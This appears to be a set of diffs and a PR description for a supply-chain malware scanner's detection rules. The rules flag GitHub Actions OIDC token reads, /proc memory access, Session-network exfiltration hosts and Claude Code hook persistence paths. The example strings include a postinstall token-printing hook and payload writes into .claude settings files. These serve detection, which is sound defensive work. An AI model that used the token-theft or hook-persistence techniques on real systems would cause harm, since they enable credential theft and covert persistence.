+    - "\"postinstall\": \"node -e 'console.log(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN)'\""
   false_positive:
-    - "# ACTIONS_ID_TOKEN_REQUEST_TOKEN is provided by the runner"
-    - "// note: ACTIONS_ID_TOKEN_REQUEST_URL is set automatically"
+    - "process.env.ACTIONS_ID_TOKEN is unrelated"
+    - "Use trusted publishing via OIDC; no env var name leaks here."
 ---
 id: SUPPLY_023
 name: "GitHub Actions runner process memory access"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -583,8 +583,12 @@ patterns:
     value: ".claude/router_runtime.js"
   - type: contains
     value: ".claude/setup.mjs"
-  - type: contains
-    value: ".claude/hooks/"
+  # `.claude/hooks` with or without a trailing slash. The word
+  # boundary covers `.claude/hooks` (mkdirSync target),
+  # `.claude/hooks/`, `.claude/hooks/postinstall.sh`, and quoted
+  # variants; it rejects `.claude/hookspad` and similar typos.
+  - type: regex
+    value: "\\.claude/hooks\\b"
   # Path-join construction: `path.join('.claude', 'hooks', ...)`,
   # `filepath.Join(".claude", "settings.json")`, etc. The
   # in-between separator covers the quote/comma/space sequence
@@ -598,6 +602,7 @@ examples:
     - "require('fs').writeFileSync('.claude/router_runtime.js', code);"
     - "cp .claude/setup.mjs $HOME/.claude/"
     - "Hook installed at .claude/hooks/postinstall.sh"
+    - "fs.mkdirSync('.claude/hooks', { recursive: true });"
     - "path.join('.claude', 'hooks', 'postinstall.sh')"
     - "filepath.Join(\".claude\", \"settings.json\")"
     - "os.path.join('.claude', 'router_runtime.js')"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -595,10 +595,12 @@ patterns:
   # `filepath.Join(".claude", "settings.json")` (path APIs use
   # comma separators), and `'.claude' + '/settings.json'` (string
   # concat uses `+` and may carry a leading slash on the second
-  # literal). The trailing segment limits matches to the known
-  # persistence files.
+  # literal). The first segment must be the literal `.claude`
+  # (the bare `claude` directory is not the hidden Claude Code
+  # surface); the trailing segment must be followed by a closing
+  # quote so unrelated suffixes like `hookspad` do not match.
   - type: regex
-    value: "['\"]\\.?claude['\"][\\s,+]+['\"]/?(settings\\.json|hooks|router_runtime\\.js|setup\\.mjs)"
+    value: "['\"]\\.claude['\"][\\s,+]+['\"]/?(settings\\.json|router_runtime\\.js|setup\\.mjs|hooks(?:/[^'\"]*)?)['\"]"
 examples:
   true_positive:
     - "fs.writeFileSync('.claude/settings.json', JSON.stringify(payload));"
@@ -613,3 +615,5 @@ examples:
   false_positive:
     - "{ \"runOn\": \"folderOpen\" } # VS Code schema example, unrelated"
     - "Tasks list with run options"
+    - "const dir = path.join('claude', 'settings.json'); // not the hidden dir"
+    - "path.join('.claude', 'hookspad') // typo, not the hooks/ path"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -547,7 +547,7 @@ name: "GitHub Actions runner process memory access"
 description: "Detects code that reads /proc/<pid>/(mem|maps|cmdline|environ) and references the Runner.Worker process name or an ACTIONS_ID_TOKEN env var. The path regex requires an explicit per-process segment, so benign root-level files like /proc/meminfo, /proc/cmdline, /proc/stat, and /proc/cpuinfo do not satisfy the rule. Targets are scoped to executable file types because match_mode: all evaluates file-wide; documentation/spec files (.md, .rst, .txt) that mention both signals in different sections are intentionally out of scope. Reading another process's memory or environment to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
 severity: CRITICAL
 category: supply-chain
-targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "*.yml", "*.yaml", "package.json"]
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "*.yml", "*.yaml", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish"]
 match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:
@@ -569,8 +569,8 @@ examples:
     - "Inspect /proc/cmdline for boot args; mentions ACTIONS_ID_TOKEN"
 ---
 id: SUPPLY_025
-name: "Editor workspace auto-execution path"
-description: "Detects references to editor workspace files that auto-execute on workspace open: Claude Code's settings.json hooks, router_runtime.js, setup.mjs, and the .claude/hooks/ directory, plus the VS Code runOn:folderOpen task trigger that turns a tasks.json entry into an auto-run. Standalone .vscode/setup.mjs and .vscode/tasks.json references are not included because they do not auto-execute on their own; the chain analyzer (jsrisk) gates VS Code persistence on the tasks.json + folderOpen pair."
+name: "Claude Code workspace persistence path"
+description: "Detects references to Claude Code workspace files that auto-execute on workspace open: settings.json hooks, router_runtime.js, setup.mjs, and the .claude/hooks/ directory. A package writing to any of these installs persistence that survives reinstall and is invisible outside the editor. VS Code persistence is handled by the jsrisk chain analyzer, which precisely gates on the tasks.json + runOn:folderOpen pair — a standalone runOn:folderOpen token is intentionally not flagged by this leaf-level rule because it appears in unrelated VS Code schemas and extension defaults."
 severity: HIGH
 category: supply-chain
 match_mode: any
@@ -584,16 +584,12 @@ patterns:
     value: ".claude/setup.mjs"
   - type: contains
     value: ".claude/hooks/"
-  - type: regex
-    value: "runOn[\"']?\\s*:\\s*[\"']folderOpen"
 examples:
   true_positive:
     - "fs.writeFileSync('.claude/settings.json', JSON.stringify(payload));"
     - "require('fs').writeFileSync('.claude/router_runtime.js', code);"
     - "cp .claude/setup.mjs $HOME/.claude/"
     - "Hook installed at .claude/hooks/postinstall.sh"
-    - "{ \"runOn\": \"folderOpen\" }"
-    - "tasks: [{label:'init', runOn: 'folderOpen'}]"
   false_positive:
-    - "Manual tasks list with run options"
-    - "Ships an example .vscode/tasks.json template; users opt in manually"
+    - "{ \"runOn\": \"folderOpen\" } # VS Code schema example, unrelated"
+    - "Tasks list with run options"


### PR DESCRIPTION
## Summary

Adds four leaf-level pattern rules that complement the chain-aware analyzers landed earlier in the round (`ci-trust`, `pkgmeta`, `jsrisk`). Each rule targets a specific supply-chain indicator that signals compromise on its own once the right text appears in source code.

### New rule IDs (category: `supply-chain`, except where noted)

| Rule | Trigger | Severity |
|---|---|---|
| `SUPPLY_022` | `ACTIONS_ID_TOKEN_REQUEST_TOKEN` or `ACTIONS_ID_TOKEN_REQUEST_URL` in package code. | HIGH |
| `SUPPLY_023` | `/proc/<pid>/(mem\|maps\|cmdline\|environ)` paired with `Runner.Worker` or `ACTIONS_ID_TOKEN` env. `match_mode: all`. | CRITICAL |
| `SUPPLY_024` (category `supply-chain-exfil`) | Reference to `filev2.getsession.org`, `seed1.getsession.org`, `seed2.getsession.org`, or `seed3.getsession.org` (Mini Shai-Hulud session exfil endpoints). | HIGH |
| `SUPPLY_025` | Reference to `.claude/settings.json`, `.claude/router_runtime.js`, `.claude/setup.mjs`, or `.claude/hooks` (with delimiter). | HIGH |

### Scope decisions documented in the rules

- **SUPPLY_022** scopes to executable file types (JS/TS/Python/shell variants, Ruby/Perl, Go/Rust, `package.json`, `action.yml`/`action.yaml` for composite actions) plus the extensionless lifecycle script basenames `install`, `postinstall`, `preinstall`, `prepare`, `prepublish`. Workflow YAML stays out because the `ci-trust` analyzer (`GHA_OIDC_001`) already gates `id-token: write` on the chain shape; leaf-firing on every legitimate trusted-publishing workflow would block CI on its intended use.
- **SUPPLY_023** uses `match_mode: all` with two patterns: `/proc/<segment>/(mem|maps|cmdline|environ)` (segment up to 80 non-`/` characters, so `/proc/'+pid+'/mem` and shell-glob `/proc/*/environ` both match while `/proc/meminfo` / `/proc/cmdline` / `/proc/stat` do not) and the OIDC/Runner.Worker token regex. Targets are the same executable set as SUPPLY_022 (no `*.md` / `*.rst` / `*.txt`) so documentation that mentions both signals does not chain.
- **SUPPLY_024** lives in `supply-chain-exfil` per category convention. Pure literal contains on the four Session-Network hosts; no legitimate package contacts them.
- **SUPPLY_025** is renamed to "Claude Code workspace persistence path" because VS Code persistence is handled by the `jsrisk` chain analyzer (precise on `tasks.json + runOn:folderOpen` pair). Standalone `runOn:folderOpen` and bare `.vscode/setup.mjs` references are intentionally out of scope to avoid HIGH findings on VS Code schemas, extension defaults, and scaffolding tools. A regex pattern covers path-join construction (`path.join('.claude', 'hooks', ...)`, `filepath.Join(".claude", "settings.json")`) and string-concat construction (`'.claude' + '/settings.json'`); the first segment must be the literal `.claude` and the second segment must end at a closing quote.

### Self-tested examples

Each rule carries `true_positive` and `false_positive` arrays that the `make test` self-test exercises automatically. Coverage includes literal paths, dynamic concat, template literals, path API calls, shell variable forms (`$pid`), shell glob forms (`/proc/*/environ`), and explicit negative cases (root-level `/proc` files, bare `claude` directory without dot, `hookspad` typo, workflow YAML with intended OIDC).

## Test plan

- [x] `make build` passes.
- [x] `make test` clean across all packages (rule self-tests included).
- [x] `make vet` clean.
- [x] `make lint` reports `0 issues.`
- [x] `aguara list-rules` shows the four new IDs.
- [x] `aguara explain SUPPLY_023` prints the patterns and examples.

## Out of scope

This is the last analyzer/rule landing in the round. The deferred cross-cutting follow-up from #73 (`list-rules` / `explain` coverage for analyzer-emitted IDs) stays scheduled for its own dedicated PR. PR 5 (npm package/version IOC database extension) is the round's last item.